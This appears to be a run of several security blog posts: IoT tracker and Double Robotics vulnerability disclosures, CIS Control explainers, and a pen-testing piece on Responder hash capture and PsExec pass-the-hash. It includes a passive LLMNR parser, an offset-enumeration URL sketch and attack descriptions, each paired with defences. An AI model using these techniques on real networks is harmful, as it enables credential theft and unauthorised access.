Mitigation for R7-2016-28.6

A vendor-supplied patch on both the server and the client should enable encrypted transfer of device data, and the website should be updated to offer HTTPS service and serve these pages only over HTTPS.


Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.


R7-2016-28.7:  Data poisoning

An unauthenticated attacker can poison the realtime tracking data by injecting device data, similar in structure to the data shown above in Figure 8, to the server over TCP port 5050. The attacker can do this only if they know a device's IMEI number, but that value is learnable through the mechanisms described above.


An example of this is shown in Figure 9, where the device's realtime tracking data was poisoned to make the device appear to be in Moscow, Russia (it was not).



Figure 9: Real time tracking data poisoned


Mitigation for R7-2016-28.7

A vendor-supplied patch should enable authentication before allowing device data to be posted to the site on TCP port 5050.


Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.


Disclosure Timeline

  • Mon, Dec 12, 2016: Initial contact made to the vendor.
  • Tue, Dec 20, 2016: Vendor responded and details provided to
  • Tue, Dec 27, 2016: Disclosure to CERT/CC, VU#375851 assigned.
  • Wed, Mar 08, 2017: CVEs assigned in conjunction with CERT/CC.
  • Mon, Mar 27, 2017: Vulnerability disclosure published.

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren’t thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk, which makes both the control itself and the conversation around why it matters important. We’ll talk about both.


Misuse of privilege is a primary method for attackers to land and expand inside networks. Two very common attacks rely on privilege to execute. The first is when a user running with privilege is tricked into opening a malicious attachment, or picks up malware from a drive-by website that loads silently in the background. Privileged accounts make these attacks succeed quickly: the user's machine can be controlled, a keylogger can be installed, or running malicious processes can be hidden from view.


The second common technique is elevation of privilege: guessing or cracking the password for an administrative user to gain access on a target machine. The risk increases considerably if the password policy is weak (8 characters is not sufficient!) or not enforced.
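Some rough keyspace math shows why 8 characters is not sufficient. The guess rate below is an assumed offline GPU cracking rate, purely for illustration; real rates depend on the hash type and hardware:

```python
# Rough math behind "8 characters is not sufficient". The guess rate is an
# assumed offline cracking rate for illustration; real numbers vary widely
# with the hash algorithm and hardware.
CHARSET = 26 + 26 + 10 + 32      # lower + upper + digits + common symbols = 94
GUESSES_PER_SECOND = 1e10        # assumption for illustration

def days_to_exhaust(length: int) -> float:
    """Days to try every password of the given length at the assumed rate."""
    return CHARSET ** length / GUESSES_PER_SECOND / 86400

print(f"8 characters:  {days_to_exhaust(8):.1f} days")   # about a week
print(f"14 characters: {days_to_exhaust(14):.2e} days")  # effectively forever
```

Even granting the attacker a generous rate, the jump from 8 to 14 characters moves exhaustive search from days to astronomical timescales, which is why the sub-controls below recommend 14 characters or more.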


What it is

Reducing administrative privilege specifically means not running services or accounts with admin-level access all of the time. This does not mean that no one should have admin; it means admin privilege should be heavily restricted to only those users whose jobs, and more specifically whose tasks, require it.


Regular, normal users of a system should never require admin privilege to do daily tasks. Superusers of a system might require admin access for certain tasks, but don’t necessarily need it all the time. Even system administrators do not require admin level access 100% of the time to do their jobs. Do you need admin access to read & send emails? Or search the web?



How to implement it

There are many different ways to implement restrictions on admin privilege, but you will first have to deal with the political issue of why you are doing this. Trust me, addressing this up front saves you a lot of heartache later on.


The political stuff

Case #1: All users have admin, whether local admin rights, admin account privileges, or both


My first question, when I see this happening in any organization, is “why do they need this?”


Typical answers are:

  • They need to install software [HINT: no they don’t.]
  • Applications might fail to work [Possible but unlikely, the app just might be installed improperly.]
  • They need it to print !!! [No.]
  • My executives demand it [They demand a lot in IT without understanding. Help them understand. See below.]
  • Why not? [Seriously?]


Some of these are valid responses. The problem is that we don’t understand the root issue driving the belief that everyone needs admin-level access to do their daily duties. And this is probably true of many organizations. It’s simpler just to give admin access because things will then work, but you create loads of risk when you do. You have to take the time to determine which functions actually need the access, and remove it from those that don’t, to lower the risk and shrink the attack surface.


All of these responses speak to worries about not being able to perform a business function when needed. They also imply that the people in charge of approving these permissions don’t really understand the risks associated with granting them. We need them to understand the small risk of occasionally needing admin and not having it, versus the much higher risk of having it when attackers strike.


Case #2: Your admins say they have to have it “to do their jobs”


I don’t disagree with this statement. Admins do need admin rights for some tasks, but not every task calls for them. Do this exercise: list all the tasks an admin does on an average day. Then mark each task that does not require admin privilege to accomplish. Show that list to the person responsible for managing risk in your organization. Then simply create a separate, normal user account for your admins, and require them to use it for all the marked tasks. For all other tasks, they escalate into their admin account and then de-escalate when done. It's an extra step, but it is a more secure one.


The conversation


Now have the conversation. It may be painful. I have actually been in meetings where people got so mad they threw things, and would be in tears when we told them we were “taking away” their privilege. This is why we say “reducing” or "controlling.” These are important words. The phrase is “we’re reducing/controlling risk by allowing you to use your privilege only for tasks that require it.” For executives that demand it, point out they are the highest risk to the organization due to their status and are frequently a high value target sought by attackers.


Then support your conversation with information from around the web: whitepapers, studies, anything that helps drive your point home.


For example, this article from Avecto illustrates that 97% of critical Windows vulnerabilities are mitigated by removing admin privilege, allowing you to focus on the remaining 3% and be more effective. Search around; there’s lots more good supporting material.


This does not need to be an expensive exercise. Using techniques like Windows delegation of authority, you can give administrative privilege to users for specific tasks, like delegating to your help desk the ability to disable accounts or move them to different OUs. They don’t need full admin to do this. On Linux systems, using sudo instead of interactive root is much less risky.
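As a sketch of what that delegation can look like on the Linux side, here is a minimal sudoers fragment; the group name and command paths are assumptions to adapt for your environment:

```
# /etc/sudoers.d/helpdesk -- illustrative sketch only; the group name and
# command paths are assumptions for your environment
%helpdesk ALL=(root) /usr/sbin/usermod -L *, /usr/sbin/usermod -U *
```

Members of the helpdesk group can run only those two commands (lock and unlock an account) as root; everything else still requires a real administrator, and every invocation is logged by sudo.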


If you are a compliance-driven organization, most compliance requirements state reduction of admin is required as part of access controls. Here’s a brief glimpse of some compliance requirements that are addressed by Control 5:


  • PCI Compliance Objective “Implement strong access control measures”
    • Sections 7.1, 7.2, 7.3, 8.1, 8.2, 8.3, 8.7


  • HIPAA Compliance 164.308(a)(4)(ii)(B)
    • Rights and/or privileges should be granted to authorized users based on a set of access rules that the covered entity is required to implement as part of § 164.308(a)(4), the Information Access Management standard under the Administrative Safeguards section of the Rule.


  • FFIEC (Federal Financial Institutions Examination Council)
    • Authentication and Access Controls


The technical stuff

Reducing admin privilege supports the Pareto principle, or the 80/20 rule. Effectively, reducing admin privilege, combined with the first four CIS Critical Security Controls, can reduce the risks in your organization by 80% or more, allowing you to focus on the remaining 20%. It’s very likely the risk reduction is even higher. The Australian Signals Directorate lists reducing admin in its Top 4 Mitigation Strategies, along with elements from Control 2 (application whitelisting) and Control 4 (an ongoing patching program).


Here is Microsoft’s guidance on implementing Least-Privilege Administrative Models. If you use Active Directory and are on a Windows domain this is very helpful in making meaningful changes to your admin models.


For Linux environments, each sysadmin should have a separate account and use the ‘su’ command to gain root. Better yet, disable su and enforce the use of the ‘sudo’ command.


There are also third parties who sell software that can help with this, such as CyberArk Viewfinity, Avecto PrivilegeGuard, BeyondTrust PowerBroker, or Thycotic Privilege Manager. Note that Rapid7 does not partner with these companies; we mention them based on what we see other organizations deploying.


All the other things

As with most of the controls, the sub-controls also list other precautions.


  • Change all default passwords on all deployed devices
  • Use multi-factor authentication for all administrative access
  • Use long passwords (14 characters or more)
  • Require system admins to have a normal account and a privileged account, and access the privileged account through an escalation mechanism, such as sudo for Linux or RunAs for Windows.
  • Configure systems to issue alerts on unsuccessful logins to admin accounts. Rapid7 offers products such as InsightIDR which can detect and alert on these events. A use case: if an admin leaves for vacation, monitor their account, and treat any login attempt during that time as a trigger for an investigation.
  • As an advanced control, admin tasks can only be performed on machines which are air-gapped from the rest of the network, and only connect to systems they need to administer.


Reducing or controlling admin is not hard to implement. However, it is a change to the way things are done, and fear of change is very powerful. Do your best to have conversations that ease the fear. You are not taking anything away. You are simply making it harder for high-impact errors to occur, and you are reducing the risk that an attacker can easily compromise an account, a system, fileshares, sensitive data, and more.


Related Resources


CIS Critical Control 1: Inventory of Authorized and Unauthorized Devices Explained

CIS Critical Control 2: Inventory of Authorized and Unauthorized Software Explained

CIS Critical Control 3: Secure Configurations for Hardware & Software Explained

CIS Critical Control 4: Continuous Vulnerability Assessment & Remediation

By Emilie St-Pierre, TJ Byrom, and Eric Sun


Ask any pen tester what their top five penetration testing tools are for internal engagements, and you will likely get a reply containing nmap, Metasploit, CrackMapExec, SMBRelay and Responder.



An essential tool for any whitehat, Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Multicast Domain Name System (mDNS) broadcast messages (try saying that out loud 5 times in a row!). It is authored and maintained by Laurent Gaffie and is available via its GitHub repository.


Once you find yourself on an internal network, Responder will quickly and stealthily get user hashes when systems respond to the broadcast services mentioned above. Those hashes can then be cracked with your tool of choice. As Responder’s name implies, the script responds to the broadcast messages sent when a Windows client queries a hostname that isn’t located within the local network’s DNS tables. This is a common occurrence within Windows networks, and a penetration tester doesn’t need to wait too long before capturing such broadcast traffic. Behold our beautiful diagram to help visualize this concept:


Because the client treats any reply as legitimate, Responder is able to send its own IP as the query answer, no questions asked. Once the reply is received, the client sends its authentication details to the malicious IP, resulting in captured hashes. And believe us, it works: we’ve seen penetration testers get hashes in a matter of seconds using this tool, which is why it is used early in an internal engagement’s timeline.
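To make the mechanics concrete, the sketch below passively parses the same LLMNR broadcasts Responder listens for. LLMNR reuses the DNS wire format over UDP multicast to 224.0.0.252:5355; this is a minimal illustration that only prints queried names, not a poisoner:

```python
# Minimal sketch of what Responder listens for: LLMNR queries, which are
# DNS-formatted UDP packets multicast to 224.0.0.252:5355. This only
# parses and prints queried names -- unlike Responder, it never answers.
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355

def parse_llmnr_query(data: bytes) -> str:
    """Pull the queried hostname out of an LLMNR packet (DNS wire format:
    a 12-byte header followed by a length-prefixed name)."""
    _txid, _flags, qdcount = struct.unpack("!HHH", data[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    labels, pos = [], 12
    while data[pos]:
        n = data[pos]
        labels.append(data[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return ".".join(labels)

def watch_broadcasts():
    """Join the LLMNR multicast group and log every name lookup heard.
    (Requires a live network; sketch only.)"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton("0.0.0.0")
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, (src, _) = sock.recvfrom(1024)
        print(f"{src} is asking who {parse_llmnr_query(data)!r} is")
```

Responder's extra step is simply to answer each parsed query with its own IP address, which is what triggers the client to authenticate to it.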


If no hashes are captured via the first method, Responder can also be used to man-in-the-middle Internet Explorer Web Proxy Auto-Discovery (WPAD) traffic. In a similar manner to the previous attack, Responder replies with its own IP address to clients querying the network for the “wpad.dat” Proxy Auto-Config (PAC) file. If successful, Responder once again grabs hashes, which can then be cracked or, if time is of the essence, used to pass-the-hash with PsExec (PsExec examples) as we will demonstrate below.

Once hashes have been captured, it’s time to get cracking! Responder saves all captured hashes in John the Ripper (Jumbo) compliant output files and in a SQLite database. A reliable cracking tool such as John the Ripper can be used to complete this step. Even if cracking is unsuccessful, the hashes can be used to validate access to other areas of the target network. This is the beauty of using Responder in conjunction with PsExec.


PsExec is a Windows-based administrative tool which can be leveraged to move laterally around the target network. It is useful to launch executables, command prompts and processes on systems. There are numerous tools available for penetration testers who wish to take advantage of PsExec’s availability within a network. For example, Metasploit has over 7 PsExec-related modules, its most popular ones being psexec and psexec_psh. There’s also the previously-mentioned Windows executable and Core Security’s impacket psexec python script. All are potential options depending on the penetration tester’s preferences and tool availability.




Many networks today struggle to reliably detect remote code execution, which is why it’s very common for penetration testers to use Responder and PsExec in the early stages of an engagement. These attacks work because of default Windows environment configurations, as well as protocol-specific behavior that trusts all responses by default.


Fortunately, such attacks can be prevented and detected. The first attack, Responder’s broadcast poisoning, can be prevented by disabling LLMNR and NBT-NS. Since networks already use DNS, these protocols aren’t required unless you’re running certain instances of Windows 2000 or earlier (in which case, we recommend a New Year’s resolution of upgrading your systems!).
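On Windows, LLMNR can be disabled via the Group Policy setting "Turn off multicast name resolution" (Computer Configuration > Administrative Templates > Network > DNS Client), which corresponds to the following registry value:

```
Windows Registry Editor Version 5.00

; Equivalent of the GPO "Turn off multicast name resolution" (disables LLMNR)
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient]
"EnableMulticast"=dword:00000000
```

NBT-NS is disabled separately, per network adapter, under the WINS tab of the adapter's advanced TCP/IP settings (or centrally via DHCP options).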


To prevent the second showcased Responder attack caused by WPAD traffic, it is simply a matter of adding a DNS entry for ‘WPAD’ pointing to the corporate proxy server. You can also disable the Autodetect Proxy Settings on your IE clients to prevent this attack from happening.

If your company uses Rapid7’s InsightIDR, you can detect use of either Responder or PsExec. Our development team works closely with our pen-test and incident response teams to continuously add detections across the Attack Chain. To that end, the Insight Endpoint Agent collects, in real time, the data required to detect remote code execution and other stealthy attack vectors. For a 3-minute overview of InsightIDR, our incident detection and response solution that combines User Behavior Analytics, SIEM, and EDR, check out the video below.


Rapid7 InsightIDR 3-Min Overview - YouTube



Welcome to the fourth blog post on the CIS Critical Security Controls! This week, I will be walking you through the fourth Critical Control: Continuous Vulnerability Assessment & Remediation. Specifically, we will be looking at why vulnerability management and remediation is important for your overall security maturity, what the control consists of, and how to implement it.


Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities.


By not proactively scanning for vulnerabilities and addressing discovered flaws, the likelihood of an organization's computer systems becoming compromised is high. Kind of like building and implementing an ornate gate with no fence. Identifying and remediating vulnerabilities on a regular basis is also essential to a strong overall information security program.


What it is:

The Continuous Vulnerability Assessment and Remediation control is part of the “systems” group of the 20 Critical Controls. This control consists of eight sections: 4.1 and 4.3 give guidelines on performing vulnerability scans; 4.2 and 4.6 cover the importance of monitoring and correlating logs; 4.4 addresses staying on top of new and emerging vulnerabilities and exposures; 4.5 and 4.7 pertain to remediation; and 4.8 covers establishing a process to assign risk ratings to vulnerabilities.


How to implement it

To best understand how to integrate each section of this control into your security program, we’re going to break them up into the logical groupings I described in the previous section (scanning, logs, new threats and exposures, risk rating, and remediation).


A large part of vulnerability assessment and remediation has to do with scanning: two sections directly pertain to scanning, and two others indirectly reference it by discussing the monitoring of scanning logs and the correlation of logs to ongoing scans. The frequency of scanning will largely depend on how mature your organization is from a security standpoint and how easily it can adopt a comprehensive vulnerability management program. Section 4.1 specifically states that vulnerability scanning should occur weekly, but we know that is not always possible due to various circumstances. This may mean monthly scans for organizations without a well-defined vulnerability management process, or weekly for those that are better established. Either way, when performing these scans it is important to have both an internal and an external perspective: machines that are internally facing only should receive authenticated scans, while outward-facing devices should receive both authenticated and unauthenticated scans.


Another point to remember about performing authenticated scans is that the administrative account being used for scans should not be tied to any particular user. Since these credentials will have administrative access to all devices being scanned, we want to decrease the risk of them getting compromised. This is also why it is important to ensure all of your scanning activities are being logged, monitored, and stored.


Depending on the type of scan you are running, your vulnerability scanner should be generating at least some attack detection events. It is important that your security team is able to (1) see that these events are being generated and (2) match them to scan logs, in order to determine whether an exploit was used against a target known to be vulnerable as part of a scan, or was part of an actual attack. Additionally, scan logs and alerts should be generated and stored to track when and where the administrative credentials were used. This way, we can verify that the credentials are only used during scans, and only on devices for which their use has been approved.
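That correlation step can be sketched in a few lines. Given approved scan windows and a stream of detection events, anything outside a window, or from an unapproved source, warrants investigation (the field names here are illustrative assumptions):

```python
# Sketch of the correlation step: classify each attack detection event as
# expected scanner traffic or something to investigate, based on whether it
# falls inside an approved scan window from an approved scanner address.
# Timestamps and field names are illustrative assumptions.

def classify_events(events, scan_windows):
    """events: list of (timestamp, source_ip) tuples.
    scan_windows: list of (start, end, scanner_ip) tuples.
    Returns a list of (event, verdict) pairs."""
    results = []
    for ts, src in events:
        expected = any(start <= ts <= end and src == scanner
                       for start, end, scanner in scan_windows)
        results.append(((ts, src), "scanner" if expected else "investigate"))
    return results

windows = [(100, 200, "10.0.0.5")]       # approved scan: time 100-200 from 10.0.0.5
events = [(150, "10.0.0.5"),             # inside window, from the scanner
          (150, "198.51.100.7"),         # inside window, unknown source
          (300, "10.0.0.5")]             # scanner IP, but outside any window
for event, verdict in classify_events(events, windows):
    print(event, verdict)
```

The second and third events are exactly the cases the control cares about: exploit activity that cannot be explained by an approved scan.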


So now that we have discussed scanning and logs, we are going to address how you can keep up with all of the vulnerabilities being released. There are several sites and feeds that you can subscribe to in order to stay on top of new and emerging vulnerabilities and exposures. Some of our favorite places are:


It isn’t enough just to be alerted to new vulnerabilities, however; we need to take the knowledge we have about our environment into consideration and then determine how these vulnerabilities will impact it. This is where risk rating comes into play. Section 4.8 states that we must have a process to risk-rate vulnerabilities based on exploitability and potential impact, and then use that rating to prioritize remediation. What it doesn’t spell out for us is what this process looks like. Typically, when we work with an organization, we recommend that for each asset they take three factors into consideration:

  1. Threat Level – How would you classify the importance of the asset in terms of the data it hosts as well as its exposure level? For example, a web server may pose a higher level of threat than a device that isn’t accessible via the Internet.
  2. Risk of Compromise – What is the likelihood that the vulnerability will compromise this system? Something to keep in mind is how easy is it to exploit this vulnerability, does it require user interaction, etc.
  3. Impact of Compromise – What is the impact to the confidentiality, integrity, and availability of the system and the data it hosts should a particular vulnerability be exploited?
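One simple way to combine the three factors, offered as an illustrative assumption rather than anything the control mandates, is a 1-to-5 rating per factor multiplied into a single priority score:

```python
# One simple way to turn the three factors into a remediation priority.
# The 1-5 scales and the multiplication are illustrative assumptions;
# Section 4.8 only requires *a* documented, consistent process.

def risk_score(threat_level: int, likelihood: int, impact: int) -> int:
    """Each factor is rated 1 (low) to 5 (high); a higher product means
    the vulnerability should be remediated sooner."""
    for factor in (threat_level, likelihood, impact):
        if not 1 <= factor <= 5:
            raise ValueError("each factor is rated on a 1-5 scale")
    return threat_level * likelihood * impact

# Internet-facing web server, easily exploited flaw, full compromise:
print(risk_score(5, 4, 5))   # 100 -- fix first
# Internal-only host, hard-to-exploit flaw, limited impact:
print(risk_score(2, 1, 2))   # 4 -- fix eventually
```

Whatever formula you choose, the point is consistency: the same inputs should always produce the same priority, so remediation order can be defended and audited.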


After our scans are complete and we are staring at the long list of vulnerabilities found on our systems, we need to determine the order in which to remediate them.


In order to ensure patches are applied across all systems within the organization, it is recommended to deploy and use an automated patch management tool as well as a software update tool. As you look to increase the overall security maturity of your organization, you will find that these tools are necessary for a standardized, centrally managed patching process. In more mature organizations, part of the remediation process includes pushing patches, updates, and other fixes to a single host first. When patching is complete on that one device, the security team performs a scan of it to ensure the vulnerability was remediated before pushing the fix across the entire organization via the aforementioned tools. Tools alone are not enough to ensure that patches were fully and correctly applied, however. Vulnerability management is an iterative process, which means that scans occurring after remediation should be analyzed to ensure that vulnerabilities that were supposed to be remediated are no longer showing up on the report.


Vulnerability management software helps you identify the holes that can be used during an attack and how to seal them before a breach happens. But it’s more than launching scans and finding vulnerabilities; it requires you to create processes around efficient remediation and to ensure that the most critical items are being fixed first. What you do with the data you uncover is more important than simply finding vulnerabilities, which is why we recommend integrating the processes around each section of Critical Control 4.


Related Resources


This post describes three vulnerabilities in the Double Robotics Telepresence Robot ecosystem related to improper authentication, session fixation, and weak Bluetooth pairing. We would like to thank Double Robotics for their prompt acknowledgement of the vulnerabilities, and for addressing the ones they considered serious. Two of the three vulnerabilities were patched via updates to Double Robotics servers on Mon, Jan 16, 2017.



These issues were discovered by Rapid7 researcher Deral Heiland. They were reported to Double Robotics and CERT/CC in accordance with Rapid7's disclosure policy.


Product Affected

The Double Telepresence Robot is a mobile conferencing device. Its mobility allows the remote user to roam around an office for meetings and face-to-face conversations.


Vendor Statement

From Double Robotics' co-founder and CEO, David Cann:

At Double Robotics, we seek to provide the best experience possible for our customers, which means not only providing an agile, innovative technology, but also, the highest level of safety and security. Rapid7's thorough penetration tests ensure all of our products run as securely as possible, so we can continue delivering the best experience in telepresence. Before the patches were implemented, no calls were compromised and no sensitive customer data was exposed. In addition, Double uses end-to-end encryption with WebRTC for low latency, secure video calls.


Summary of Vulnerabilities

  • R7-2017-01.1: Unauthenticated access to data
    • An unauthenticated user could gain access to Double 2 device information including: device serial numbers, current and historical driver and robot session information, device installation_keys, and GPS coordinates.
  • R7-2017-01.2: Static user session management
    • The access token (also referred to as the driver_token) which is created during account assignment to a Robot was never changed or expired. If this token was compromised, it could be used to take control of a robot without a user account or password.
  • R7-2017-01.3: Weak Bluetooth pairing
    • The pairing process between the mobile application (iPad) and robot drive unit does not require the user to know the challenge PIN. Once paired with the robot drive unit, a malicious actor can download the Double Robot mobile application from the Internet and use it (along with the web services) to take control of the drive unit.


Vulnerability Details and Mitigations

R7-2017-01.1: Unauthenticated access to data

In the following example, critical information related to a session was accessed via an unauthenticated session URL. By incrementing the "offset=" number in that URL, information for all historical and current sessions could be enumerated:




In the next example, robot and user installation keys were enumerated by incrementing the "offset=" number in a similar unauthenticated URL, as shown below:
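Both enumeration issues reduce to walking a paginated, unauthenticated API. A minimal sketch of what that looks like (the endpoint and parameter names here are illustrative, not Double Robotics' actual URLs):

```python
# Sketch of offset-based enumeration against an unauthenticated,
# paginated API. The base URL and parameter names are hypothetical.
from urllib.parse import urlencode

def enumeration_urls(base_url, start=0, stop=100, step=1, fmt="json"):
    """Yield candidate URLs, stepping the 'offset' parameter."""
    for offset in range(start, stop, step):
        query = urlencode({"offset": offset, "format": fmt})
        yield f"{base_url}?{query}"

urls = list(enumeration_urls("https://api.example.com/sessions", stop=3))
# Each URL differs only in its offset value; an attacker simply
# requests them in order until the records run out.
```

The point is how little work is required: with no authentication check on the endpoint, a for-loop is the entire attack.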




On Mon, Jan 16, 2017, Double deployed a server patch to mitigate this issue.

R7-2017-01.2: Static user session management

Although the driver_token is a complex, unique, 40-character token (and so unlikely to be guessed), it can still be enumerated by anyone who has access to the Double Robot iPad or is successful in creating an SSL man-in-the-middle attack against the device. For example, via a successful man-in-the middle attack or access to the robot iPad's cache.db file, a malicious actor could identify the robot_key as shown below:






Using this robot_key, an unauthenticated user could enumerate all of the user access tokens (driver_tokens) which allow remote control access of the robot. An example of this enumeration method is shown below:




On Mon, Jan 16, 2017, Double Robotics deployed a server patch to mitigate this issue. The API queries described above no longer expose related session tokens to the Double device.
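The underlying weakness here was a bearer token that never changed or expired. A common countermeasure is a signed, time-limited token; the following is a minimal sketch of that general technique using Python's standard hmac module (an illustration only, not Double Robotics' actual fix):

```python
import hashlib
import hmac
import time

SECRET = b"server-side-secret"  # hypothetical server-held key

def issue_token(user_id: str, now: float = None) -> str:
    """Issue a token bound to a user ID (no colons) and an expiry time."""
    expires = int((now or time.time()) + 3600)  # valid for one hour
    msg = f"{user_id}:{expires}".encode()
    sig = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return f"{user_id}:{expires}:{sig}"

def verify_token(token: str, now: float = None) -> bool:
    """Reject tokens that are tampered with or past their expiry."""
    user_id, expires, sig = token.rsplit(":", 2)
    msg = f"{user_id}:{expires}".encode()
    expected = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False
    return (now or time.time()) < int(expires)

tok = issue_token("driver42")
```

Because the signature covers the expiry timestamp, a captured token stops working after its window closes, and neither field can be altered without the server-side key.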


R7-2017-01.3: Weak Bluetooth pairing

The exposure of this vulnerability is limited since the unit can only be paired with one control application at a time. In addition, the malicious actor must be close enough to establish a Bluetooth connection. This distance can be significant (up to 1 mile) with the addition of a high-gain antenna.


On Mon, Jan 16, 2017, Double Robotics indicated it did not see this as a significant security vulnerability, and that it does not currently plan to patch. Users should ensure that the driver assembly remains paired to the control iPad to avoid exposure.


Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Dec 2016: Discovered by Rapid7's Deral Heiland
  • Mon, Jan 09, 2017: Disclosed to Double Robotics
  • Mon, Jan 09, 2017: Double Robotics acknowledged the vulnerabilities
  • Mon, Jan 16, 2017: R7-2017-01.1 and R7-2017-01.2 were fixed by Double Robotics via server patches
  • Tue, Jan 24, 2017: Disclosed to CERT/CC
  • Wed, Jan 25, 2017: Rapid7 and CERT/CC decided not to issue CVEs for these vulnerabilities. R7-2017-01.01 and 01.02 were present in Double's web application server. As there was only one instance of the affected software, and no user action was required to apply the fixes, no CVE is warranted. R7-2017-01.03 is an exposure for users to be aware of, but it only allows control of the drive unit if pairing is successful. User data cannot be modified without additional compromise.
  • Sun, Mar 12, 2017: Disclosed to the public

Stop number 3 on our tour of the CIS Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls) deals with Secure Configurations for Hardware & Software. This is great timing with the announcement of the death of SHA1. (Pro tip: don’t use SHA1). The Critical Controls are numbered in a specific way, following a logical path of building foundations while you gradually improve your security posture and reduce your exposure. Control 1: Inventory of Authorized and Unauthorized Devices, and Control 2: Inventory of Authorized and Unauthorized Software are foundational to understanding what you have. Now it’s time to shrink that attack surface by securing the inventory in your network.


As stated in the control description, default configurations for operating systems and applications are normally geared toward ease-of-deployment and not toward security. This means open and running ports and services, default accounts or passwords, older and more vulnerable protocols (I’m looking at YOU, telnet), pre-installed and perhaps unnecessary software, and the list goes on. All of these are exploitable in their default state.


The big question is, what constitutes secure configurations? As with most questions in information security, the answer is contextual, based on your business rules. So before you attempt a secure configuration, you need some understanding of what your business needs to do and what it does today. This also means a lot of detailed analysis of your applications, which can be a complex task. It is also a continuous process, not just “one and done”: secure configuration must be continually managed to avoid security decay. As you implement vulnerability management, your systems and applications will be patched and updated, and this will change your position on secure configurations. Configurations will change based on new software or operational support changes, and if they are not secured, attackers will take advantage of the opportunities to exploit both network-accessible services and client software.


What It Is

Secure Configurations for Hardware & Software is part of the “systems” group of the CIS critical security controls. This means that this is in the back office, by IT and security, and should not be handled by users in the front office. It’s very likely that your organization is using some kind of secure configs unless you run 100% out-of-the-box. Rapid7 finds that most orgs do not go far enough, and a lot of exposure exists that has no defined business purpose or need.


This control is broken down into seven sub-controls. The sub-controls describe the entire process of managing secure configurations, but do not go into specifics about the configurations themselves. So we will cite resources here you can use to help you start to securely configure your enterprise (and even your home systems).


How to Implement It


There are many ways to go about secure configurations, and it’s likely that not everything publicly available is going to be completely relevant. As you would with a deny-all rule in a firewall deployment, approach these with a mindset of starting as small as you can and gradually opening up your systems and applications until they are usable. This works well for new systems or those yet to be deployed. But what about older systems? It’s not very likely you can just shut them down and work this process. Still, you should seek to reduce the running services and ports, especially those which are known to be vulnerable and not in use.


The Configs

There are a number of usable resources for secure configurations. Rapid7 regularly recommends the following to clients:


  • NIST 800-70 rev 3
    • This NIST special publication governs the use of checklists; it is not itself a configuration guide. It is most valuable in breaking down configuration levels for using multiple checklists. This is especially useful in complex business environments, where you will need many different configuration baselines for your systems. It also contains information on developing, evaluating, and testing your checklists.
  • National Vulnerability Database (NVD)
    • The NVD, maintained by NIST, is a great repository for many things in Control 4 (Vulnerability Management), and it is also useful for Control 3 with its checklists. This repo contains SCAP content, Group Policy Objects for Active Directory, and human-readable settings. This is a great starting point for any secure configuration activity.
  • CIS Benchmarks
    • Sometimes referred to as hardening guides, these are officially the CIS Benchmarks. Curated by the same organization that maintains the Critical Controls, the CIS Benchmarks are available for multiple operating systems, web browsers, mobile devices, virtualization platforms, and more. You can also get SCAP-compliant checklists in XCCDF format for direct application to systems.
  • Security Technical Implementation Guide (STIG)
    • The STIGs are curated by the federal government, adhering to rules and guidelines issued by the Department of Defense. These pages contain actual configuration templates (some in SCAP format) that can be directly applied to systems. There are also templates for cloud-based services, application security and a lot of training references. STIGs are great, but not for the faint of heart, or for organizations who don’t have a deep technical understanding of the application or OS they’re attempting to reconfigure. So handle them with caution, but they are very helpful in locking down systems.


Minimum Standards

All of the above resources are based on consensus and community or government standards, and are considered sound strategies to reduce your attack surface. They are not comprehensive, and as already stated, your mileage may vary; you should take a customized approach that best supports your business needs.


At the end of the day, what you are looking to do is maintain a set of minimum standards for your configs. You can pore through the checklists to give you ideas, like disable IPv6 if it is not necessary, don’t use RDP without TLS, don’t ever run Telnet ever for any reason ever. Did I mention not to run telnet? Build your checklist and use it for all your deployments, and don’t forget about your existing and vulnerable systems! They need extra love too.
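A checklist like this can also be made machine-checkable. Below is a toy sketch that flags observed listening services against an example blocklist (the ports and the policy itself are illustrative, not a complete minimum standard):

```python
# Toy audit of observed listening ports against a minimum standard.
# The blocklist below is an example policy, not a complete baseline.
BANNED = {23: "telnet", 21: "ftp", 512: "rexec", 513: "rlogin"}

def audit_ports(open_ports):
    """Return (port, service) pairs that violate the minimum standard."""
    return [(p, BANNED[p]) for p in sorted(open_ports) if p in BANNED]

# Ports as reported by, say, a discovery scan of one host:
violations = audit_ports({21, 22, 23, 80, 443})
# telnet and ftp should surface as findings; 22/80/443 pass.
```

Even a crude script like this, run against scan output on a schedule, turns "don't ever run telnet" from a slogan into a repeatable check.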


Rapid7 observes many organizations that know they have a vulnerable legacy system that they cannot modify directly to reduce the attack surface. If you have one of these brittle/fragile/unfixable systems, consider ways to limit inbound/outbound access and connectivity to help mitigate the risk until it can be upgraded or replaced with something more securable.


All The Other Things

Everything above talks about the first sub-control, which is the secure config itself. There are several more things this control covers, such as:

  • Follow strict configuration management processes for all changes to your secure builds.
  • Create master images (gold images) that are secure, and store those in a safe and secure location so they can’t be altered.
  • Perform remote administration only over secure channels, and use a separate administration network if possible.
